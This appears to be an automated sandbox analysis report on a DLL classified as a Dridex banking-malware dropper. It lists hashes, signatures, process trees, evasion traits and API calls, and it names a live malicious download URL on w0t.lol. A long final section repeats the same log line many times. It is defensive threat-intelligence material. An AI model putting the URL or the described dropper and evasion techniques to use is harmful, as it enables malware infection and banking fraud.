Windows Analysis Report
e.dll

Overview

General Information

Sample name: e.dll
Analysis ID: 1519390
MD5: 972d3e17b96745be89b80ec5d8f4f9d3
SHA1: e97c6461bbdcd91566f4cb75b456e399b7fe06c2
SHA256: b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda

Detection

Dridex Dropper
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Dridex dropper found
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • loaddll32.exe (PID: 6920 cmdline: loaddll32.exe "C:\Users\user\Desktop\e.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4516 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 916 cmdline: rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: e.dll | Avira: detected
Source: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c | Avira URL Cloud: Label: malware
Source: https://w0t.lol/ | Avira URL Cloud: Label: malware
Source: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA | Avira URL Cloud: Label: malware
Source: e.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_27AC1120 GetTickCount, SHGetValueA, SHSetValueA, UuidCreateSequential, sprintf, RtlComputeCrc32, GlobalAlloc, sprintf, RtlComputeCrc32, sprintf, RtlComputeCrc32, sprintf, GetModuleFileNameA, sprintf, GetCommandLineA, sprintf, memset, CryptBinaryToStringA, sprintf, memset, EnumDisplaySettingsA, sprintf, memcpy, memcpy, memset, GlobalFree, CryptAcquireContextA, CryptDecodeObjectEx, CryptImportPublicKeyInfo, CryptEncrypt, CryptBinaryToStringA, memset, GlobalFree, URLDownloadToCacheFileA, lstrlen, memset, GlobalFree, _lopen, _hread, _lclose, WinExec, GlobalFree
Source: e.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: Binary string: a:\s7i.pdbL | source: e.dll
Source: Binary string: a:\s7i.pdb | source: loaddll32.exe, 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06622A81 FindFirstFileW

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 104.21.69.9 443
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: w0t.lol
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: w0t.lol
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 26 Sep 2024 11:12:36 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Cache-Control: no-cache, no-store, must-revalidate
  CF-Cache-Status: DYNAMIC
  Speculation-Rules: "/cdn-cgi/speculation"
  Server: cloudflare
  CF-RAY: 8c92d1d5482d3af0-IAD
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/
Source: rundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757

E-Banking Fraud

Source: Initial file | Signature Results: Dridex dropper behavior
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 6%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_0660D969 NtQuerySystemInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06606790 NtQueryDirectoryObject
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04E52084 NtCreateThreadEx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_065FD53D DeviceIoControl
Source: e.dll | Static PE information: Number of sections: 13 > 10
Source: e.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: e.dll | Static PE information: Section: z4g ZLIB complexity 0.9946666190294715
Source: e.dll | Static PE information: Section: qm ZLIB complexity 0.9991314643252213
Source: e.dll | Static PE information: Section: L ZLIB complexity 0.9966262291217672
Source: classification engine | Classification label: mal80.bank.evad.winDLL@6/0@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:304:WilStaging_02
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\e.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: z55x9i2q7.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security
Source: e.dll | Static file information: File size 2228224 > 1048576
Source: e.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e.dll | Static PE information: section name: .crt1
Source: e.dll | Static PE information: section name: z4g
Source: e.dll | Static PE information: section name: qm
Source: e.dll | Static PE information: section name: L
Source: e.dll | Static PE information: section name: CONST
Source: e.dll | Static PE information: section name: 3
Source: e.dll | Static PE information: section name: buicKDZl
Source: e.dll | Static PE information: section name: CRT
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E5D1F4 push edi; ret 0_2_00E5D1F5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E599DB pushfd; iretd 0_2_00E599DC
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E5996B pushfd; ret 0_2_00E5997B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_04FDD5C8 push ebp; retf 3_3_04FDD5C9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_066225F0 push esi; mov dword ptr [esp], ecx 3_3_066225F4
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe | Section loaded: \KnownDlls32\TeSTAPp.EXE
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
